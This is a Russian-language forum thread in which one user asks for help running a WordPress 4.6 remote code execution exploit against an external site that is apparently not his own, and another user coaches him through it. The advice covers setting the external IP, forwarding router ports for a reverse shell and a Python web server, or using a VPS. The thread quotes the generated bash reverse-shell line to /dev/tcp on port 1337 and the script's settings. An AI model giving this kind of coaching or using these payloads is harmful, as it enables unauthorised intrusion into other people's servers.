Помогите с эксплуатацией эксплойта

[CryNet]

Хочу проэксплуатировать WP 4.6 Remote Code Execution.
Сам сплойт:

Ссылка скрыта от гостей

.
Есть сайт нужной версии, в системе есть netcat.
При запуске: ./wordpress-rce-exploit.sh site.com я вижу в консоли какой-то HTML и просто всё подвисает, нет сообщения о неудачное эксплуатации и т.д. А рядом создаётся файл rce.txt с содержимым:
(sleep 3s && nohup bash -i >/dev/tcp/192.168.57.1/1337 0<&1 2>&1) &

Что я делаю не так и как правильно проэксплуатировать

Ага! Среди кучи HTML-я заметил это:

• Listening on 0.0.0.0 1337

В скрипте я вписал свой IP rev_host="192.168.0.4", именно этот адресс указан в веб-морде роутера

 

[Pernat1y]

Если ты пробиваешь внешний сайт (не из твоей локалки), то нужно указывать свой внешний айпишник + пробросить порты на роутере (один для веб сервера, который поднимается питоном - 80 и один для шелла - 1337).
Либо юзать какой-то промежуточный VPS/VDS.

 

[CryNet]

Если ты пробиваешь внешний сайт (не из твоей локалки), то нужно указывать свой внешний айпишник + пробросить порты на роутере (один для веб сервера, который поднимается питоном - 80 и один для шелла - 1337).
Либо юзать какой-то промежуточный VPS/VDS.

Да. Сайт не из моей локали

 

[CryNet]

пробросить порты на роутере (один для веб сервера, который поднимается питоном - 80 и один для шелла - 1337)

А не подскажите по пробросу, я просто никогда этого не делал... Как правильно это сделать?
У меня сейчас так:

Порт сервиса	IP-адрес	Внутренний порт	Протокол	Состояние	Изменить

1337

192.168.0.4

1337

TCP или UDP

Включено

Изменить

Я на правильном пути?

 

[Pernat1y]

Я на правильном пути?

Похоже.
Дальше в эксплоите свой внешний айпишник используй. Если не прокатит, то есть вероятность того, что на твоём провайдере такое не заработает. Тогда копать в сторону VPS/VDS.

 

[CryNet]

Похоже.
Дальше в эксплоите свой внешний айпишник используй. Если не прокатит, то есть вероятность того, что на твоём провайдере такое не заработает. Тогда копать в сторону VPS/VDS.

А 80 я не могу пробросить: Ошибка: Порт удалённого управления веб-интерфейсом конфликтует с портом виртуального сервера.

 

[Pernat1y]

А 80 я не могу пробросить: Ошибка: Порт удалённого управления веб-интерфейсом конфликтует с портом виртуального сервера.

Поправь порт, на котором будет слушать веб сервер на питоне и откуда будет забирать файл эксполоит.

 

[CryNet]

Поправь порт, на котором будет слушать веб сервер на питоне и откуда будет забирать файл эксполоит.

Не-е-е... та же ошибка...

Warning: Inverse name lookup failed for `0.0.5.57'
Listening on any address 43069

Сейчас проброс выглядит так:

	Порт сервиса	IP-адрес	Внутренний порт	Протокол	Состояние	Изменить

	1337	192.168.0.4	1337	TCP или UDP	Включено	Изменить
	81	192.168.0.4	81	TCP или UDP	Включено	Изменить

 

[Pernat1y]

`0.0.5.57'

Ничего не смущает?

Тебе в скрипте нужно поправить:
rev_host="192.168.57.1" на твой внешний айпишник
И тут python -mSimpleHTTPServer 80 2>/dev/null >&2 & заменить порт на 81.

 

[CryNet]

Ничего не смущает?

Тебе в скрипте нужно поправить:
rev_host="192.168.57.1" на твой внешний айпишник
И тут python -mSimpleHTTPServer 80 2>/dev/null >&2 & заменить порт на 81.

Та это я-то сделал. Результат тот же.

 

[Pernat1y]

Та это я-то сделал. Результат тот же.

Покажи полный скрипт, с какими параметрами запускается и полный вывод.
Сайт и свой айпишник можно не светить

 

[CryNet]

Покажи полный скрипт, с какими параметрами запускается и полный вывод.
Сайт и свой айпишник можно не светить

Скрипт:

Ссылка скрыта от гостей

Запуск: ./wordpress-rce-exploit.sh site.info
Вывод:

Ссылка скрыта от гостей

Мне кажеться тут ещё дело в том, что на одном IP несколько сайтов. Например при запуска аналогичного эксплойта в Метасплойте (он там, кстати, тоже есть), последний выдаёт ошибку выводя IP-адресс моего таргета и спрашивая "тут точно установлен WordPress?". Ну а перейдя по IP выводится заглушка хостера. Хотя я в RHOST указал именно адресс сайта, а не его IP.